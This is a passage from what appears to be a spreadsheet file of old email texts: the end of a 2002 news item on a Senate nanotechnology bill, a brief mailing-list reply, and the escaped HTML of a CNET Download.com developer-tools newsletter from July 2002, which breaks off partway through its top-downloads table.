 education and training for the next generation of nanotechnology researchers
 and professionals.
 "The unanimous support of the Senate Commerce Committee is a very big step
 forward for this very small technology," Lieberman, who vowed to pushed to
 full Senate passage before the end of the year, said. "Nowhere in the world
 are the wheels of innovation spinning more rapidly than in the realm of
 nanotechnology. The U.S. certainly possesses the raw resources and talent to
 lead the world in developing this technology. Our legislation will provide
 the nation with a long-term focus and sustained commitment, and facilitate
 new collaborations between government, academia, and industry that will
 ensure our place at the head of the next wave of innovation."
 The bill would place coordination and management of the nanotechnology
 program under the National Science and Technology Council. It would also
 create a Presidential National Nanotechnology Advisory Panel and National
 Nanotechnology Coordination Office, which would provide administrative and
 technical support for the Advisory Panel and the Council.
 "My own judgment is the nanotechnology revolution has the potential to
 change America on a scale equal to, if not greater than, the computer
 revolution. I am determined that the United States will not miss, but will
 mine the opportunities of nanotechnology," Wyden said in introducing the
 bill. "At present, efforts in the nanotechnology field are strewn across a
 half-dozen federal agencies. I want America to marshal its various
 nanotechnology efforts into one driving force to remain the world's leader
 in this burgeoning field. And I believe federal support is essential to
 achieving that goal.
 To study the potential long-term effects of nanotechnology, a new Center for
 Societal, Ethical, Educational, Legal and Workforce Issues Related to
 Nanotechnology would also be established.
 According to Lieberman, the bill closely tracks the recommendations of the
 National Research Council (NRC), which completed a thorough review of the
 National Nanotechnology Initiative in June.
 Those recommendations included establishing an independent advisory panel;
 emphasizing long-term goals; striking a balance between long-term and
 short-term research; supporting the development of research facilities,
 equipment and instrumentation; creating special funding to support research
 that falls in the breach between agency missions and programs; promoting
 interdisciplinary research and research groups; facilitating technology
 transition and outreach to industry; conducting studies on the societal
 implications of nanotechnology, including those related to ethical,
 educational, legal and workforce issues; and the development of metrics for
 measuring progress toward program goals.
</t>
  </si>
  <si>
    <t xml:space="preserve">Reza B'Far (eBuilt) wrote:
 &gt; problems.... Why do most computer scientists insist on solving the same
 &gt; problems over and over again when there are some many more important and
 &gt; interesting problems (high level) to be solved ?????
 Amen!
 Doing it in an (unecessarily) harder way does NOT make you more of a man
 (or less of a kiddie).
 - Joe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This Week: Chilkat Zip, Anfy Java, VB-PowerWrap
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Download Dispatch: Tools for Software Developers&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 5.50.4616.200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#eeeeee&gt;
 &lt;CENTER&gt;
 &lt;!-- header --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#ffffff border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=442 colSpan=4&gt;&lt;IMG height=60 alt="Download Dispatch - Tools
 for Software Developers"
 src="http://download.cnet.com/i/dl/scr/442_downldHDR_softwr.gif"
 width=442&gt;&lt;BR&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=0 width=442 bgColor=#ffcc00 border=0&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD bgColor=#000000 colSpan=3&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;&lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 	&lt;TD width=10 rowSpan=2&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 	&lt;TD width=430&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;&lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/TD&gt;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&lt;/A&gt;&lt;BR&gt;&amp;nbsp;&lt;BR&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- featured collections --&gt;
 &lt;IMG height=20 src="http://a.r.tv.com/cnet.1d/i/nl/shw/rhc_featcol.gif"
 width=150&gt;&lt;BR&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0Lrt5UaQUvBz6gEwTinhlyR" &gt;Stamp out the bugs
 &lt;BR&gt;&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;
 Does your code need a once-over? Debug your software with this collection of tools and utilities designed to locate and correct programming mistakes, track defects, and more.
 &lt;BR&gt;&lt;/FONT&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;!-- end featured collections --&gt;
 &lt;!-- &lt;P&gt;&lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWZOIe5QH3XX8owMnerlR" &gt;&lt;IMG height=40
 src="http://catchup.cnet.com/catchup_btn2.gif" width=160 border=0&gt;&lt;/a&gt;
 &lt;P&gt; --&gt;
 	&lt;!-- updates &amp; drivers --&gt;
 	&lt;IMG height=20 alt="Software Updates"
 src="http://www.cnet.com/i/nl/dl/rhc_up.gif" width=150&gt;&lt;BR&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xDVaFVomap_vCgSyiL4R" &gt;XML Spy Suite 4.4&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Open and edit XML, XSL, 3DML, or DTD documents.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2MVLxtrNQ1U5MauO37xrR" &gt;JadeIDE for Java 3.0
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Use this GUI to edit your source code more easily.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWWMSEzgA8IeOdSKzjX1iR" &gt;UniquE RAR File Library 0.4.0&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Enable your applications to create and decompress RAR archives.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB6raNgZ0x-EDvznhjonlZR" &gt;SkICMP ActiveX Control 2.2&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Diagnose, troubleshoot, and monitor your network.&lt;P&gt;
 	&lt;!-- end updates &amp; drivers --&gt;
 &lt;!-- shopper upgrades --&gt;
 &lt;IMG height=20 alt="Software
 Upgrades"src="http://a.r.tv.com/cnet.1d/i/nl/cu/rhc_shopper.gif"
 width=150&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD colSpan=2&gt;&lt;FONT face="Arial, Helvetica, sans-serif"
 size=2&gt;&lt;B&gt;Software Upgrades:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
  				 &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IIDd6JKw24YOLpk6Td6dR" &gt;
 				 ZoneAlarm Pro 3.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6DGnfgjzKns2asfI8UkRR" &gt;
 				 Norton AntiVirus 2002&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQokH6V4Taf70SVbToBBPR" &gt;
 				 AdSubtract Pro 2.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBaJQDsa7Figi7yr9FKgnR" &gt;
 				 Microsoft Windows XP - Professional&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				               &lt;TR vAlign=top&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqyAiehm7ydDX7NdmUVSeR" &gt;
 				 Nero Burning ROM 5.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;6.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				                  &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WwvklENj4kHF6q-jPexAyR" &gt;
 				 Reason 2.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                    &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 	                       size=-1&gt;&lt;B&gt;&amp;nbsp;7.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				 	                     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 	                     &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwUkK0709ie23s1N87hJlR" &gt;
 				 Microsoft Windows XP - Home Edition&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				               &lt;TR vAlign=top&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 		                    size=-1&gt;&lt;B&gt;&amp;nbsp;8.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 		                  &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkh4U6j9b0QzbMuLbLad4R" &gt;
 				 QuickBooks Pro 2002&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;9.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzdpO0mtnhKQcaLlAI6OrR" &gt;
 				 Adobe Photoshop 7.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 size=-1&gt;&lt;B&gt;10.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qUUxswDmTiMEyR1N675iR" &gt;
 WinZip 8.1&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;p&gt;
 &lt;TR&gt;
 &lt;p&gt;&lt;TD colSpan=2&gt;
 &lt;P&gt;&lt;FONT face="Arial, Helvetica, sans-serif" size=-2&gt;Find a complete
 list of the 50 most popular software products at &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89w3bPx_ktQ3DlPfP8N4R" &gt;&lt;B&gt;CNET
 Shopper.com&lt;/B&gt;&lt;/A&gt;.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;p&gt;
 &lt;!--  end shopper upgrades --&gt;
 	&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/P&gt;&lt;/TD&gt;
 &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
 src="http://www.cnet.com/i/nl/dd_c.gif" width=9&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=430 bgColor=#ffffff&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 bgColor=#ffffef border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD rowSpan=2 width=10&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=10&gt;&lt;/TD&gt;
 &lt;TD colSpan=3&gt;
 &lt;!-- date --&gt;
 &lt;FONT face="arial, helvetica"
 size=-2&gt;July 17, 2002 &lt;/FONT&gt;
 &lt;!-- /date --&gt;
 &lt;P&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;FONT color=#333333
 size=3&gt;&lt;B&gt;Greetings from Download.com!&lt;/B&gt;&lt;/FONT&gt;&lt;p&gt;
 No software developer is immune to bugs. Even the cleanest code
 will have to go through a debugging process, but some debuggers
 are more efficient than others. Check out Download.com's
 complete collection of debugging tools &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW17ylrk9Z5VKc-3P0BcR" &gt;here&lt;/a&gt;, and put away the
 can of Raid.&lt;p&gt;
 Also this week, we've got some very handy utilities. First,
 there's Chilkat, a cool zip/unzip ActiveX control that you can
 add to any language with ActiveX support (which is most major
 ones). But my personal favorite is VB-PowerWrap, a simple tool
 that takes all the far-flung bits and pieces of your Visual Basic
 masterpiece and socks them all away into one executable file
 for ease of distribution.&lt;p&gt;
 Becky Waring&lt;br&gt;
 Contributing Editor, CNET Download.com&lt;p&gt;
 &lt;/FONT&gt;&lt;/P&gt;
 &lt;/TD&gt;&lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 	&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width=430&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;!-- Leads Module --&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;!--  reviews and features --&gt;
 &lt;TABLE border="0" cellPadding=10 cellSpacing=0 width=430&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;IMG alt="Reviews &amp;amp; Features"
 src="http://www.cnet.com/i/nl/lx/sub_rev.gif" border=0&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410 border=0&gt;&lt;BR&gt;
 &lt;font size=-2&gt;From Builder.com&lt;/font&gt;&lt;br /&gt;
 &lt;FONT face=arial,helvetica size=-1&gt;
 &lt;A name=h1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHOQcmtCEYjKHbtbXYzHRR" &gt;Achieving
 persistence with Entity Beans&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;
 Enterprise JavaBeans (EJB) allow for greater code reuse and
    flexibility. See how Entity Beans enable you to leverage EJB
    functionality in your apps.
 &lt;br /&gt;&lt;br /&gt;
 &lt;img src="http://home.cnet.com/b.gif" height=5 width=1&gt;&lt;br /&gt;
 &lt;FONT face=arial,helvetica size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEI0t742-K7Bc1bJBykEmZR" &gt;Counting
 lines of code can help measure progress&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;
 One developer has come around to thinking that counting lines
    of code can yield useful information. He explains why and
    shares a sample app that automates the process.
 &lt;p /&gt;
 &lt;/font&gt;
 &lt;P&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;!-- End reviews and features --&gt;
 &lt;!-- picks of the week --&gt;
 &lt;IMG alt="Picks of the week"
 src="http://www.cnet.com/i/nl/dl/sub_picks.gif" border=0&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
 &lt;FONT size=-2&gt;in ActiveX&lt;/FONT&gt;&lt;BR&gt;
  &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK14addEXl6gJLkjCXMZHnR" &gt;Chilkat Zip 6.0.2&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Need to add zip capability to your apps? Create and
    decompress zip archives with the Chilkat Zip ActiveX
    control. The control provides easy access to individual files
    stored within a zip archive. You can search for a file within
    the zip using a wildcard string and then extract individual
    files or files matching a pattern. Files can be unzipped to
    any directory, and the control's memory management allows any
    size file to be compressed or decompressed in a constant
    memory footprint. The control allows you to compress directly
    from memory buffers or strings, as well as add multiple files
    with wildcarding. There's even a real-time progress monitor
    for zip and unzip operations. Chilkat supports Active Server
    Pages, Visual Basic, Visual C++, Delphi, C++ Builder, and all
    languages that use ActiveX controls.
 &lt;P&gt;
 &lt;FONT size=-2&gt;in Java&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1B4XYK9w3V0z6qjySJGeR" &gt;Anfy Java 2.0&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Anfy is a collection of 52 applets for Web pages, desktop
    wallpapers, or screensavers. Within the program's simple
    interface, you can quickly apply real-time graphic effects to
    GIF and JPEG images. Effects include 3D texture-mapped cube
    menus, lake effects, water and fire, deformations, zoom
    rotators, lens magnification, waving flags, animations,
    scrolling text, customizable IFS fractals, color changers,
    light shading, tunnels, and wormholes.
 &lt;P&gt;
 &lt;FONT size=-2&gt;in Tools &amp;amp; Editors&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKe1dwZCldWfGJ0kSyVjyR" &gt;VB-PowerWrap 3.1&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Distribute Visual Basic applications the easy way with
    VB-PowerWrap. VB-PowerWrap embeds all dependent and
    non-dependent files into the executable of your VB program,
    including DLLs and OCXs, graphics, databases, and text files,
    to create a single clickable application. VB-PowerWrap scans
    a VB project, wraps the appropriate files, and creates a
    self-contained file for distribution. In addition,
    VB-PowerWrap compresses all DLLs and OCXs and registers
    appropriate controls on the user's machine if needed. It
    works with Visual Basic 4, 5, and 6.
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- top ten --&gt;
 &lt;A name=h2&gt;&lt;IMG height=19 alt="This Week's Top Ten Downloads"
 src="http://www.cnet.com/i/nl/dl/sub_top10.gif"
 width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=8
 src="http://www.cnet.com/i/nl/rule.gif"
 width=410&gt;&lt;BR&gt;&lt;/FONT&gt;
 &lt;TABLE cellSpacing=0 cellPadding=4 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD width="6%" height=36&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;Most
 Popular Titles&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Week ending July 14
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Last&lt;BR&gt;&amp;nbsp;&amp;nbsp;Week&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="16%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Weeks&lt;BR&gt;&amp;nbsp;&amp;nbsp;on&amp;nbsp;Chart&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="26%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Downloads&lt;BR&gt;&amp;nbsp;&amp;nbsp;This
 Week&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=65&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 1.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRhtLmiigVnxXFZcIuInR" &gt;Microsoft
 Windows Installer (95/98/Me)&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 2&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 9,082&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt; &lt;TD colSpan=5&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;&lt;TR&gt; &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDhx0kzRRmBekeVktk2eR" &gt;Microsoft
 Data Access Components RTM&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 3&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 8,901&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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3.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2Fgt9hrJ1kOqFb2GVaGyR" &gt;Java 2
 Runtime Environment, SE&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 4&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 8,197&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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4.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jHs5U1jrwvurMPGPxZ6RlR" &gt;Visual Basic
 6.0 Runtime Module SP5&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 5&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 73&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 7,960&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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5.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFDOlw6QxDblRuaBDxRU4R" &gt;Mozilla (32-bit)
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 7&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 5&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 6,683&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt; &lt;TD colSpan=5&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;&lt;TR&gt; &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
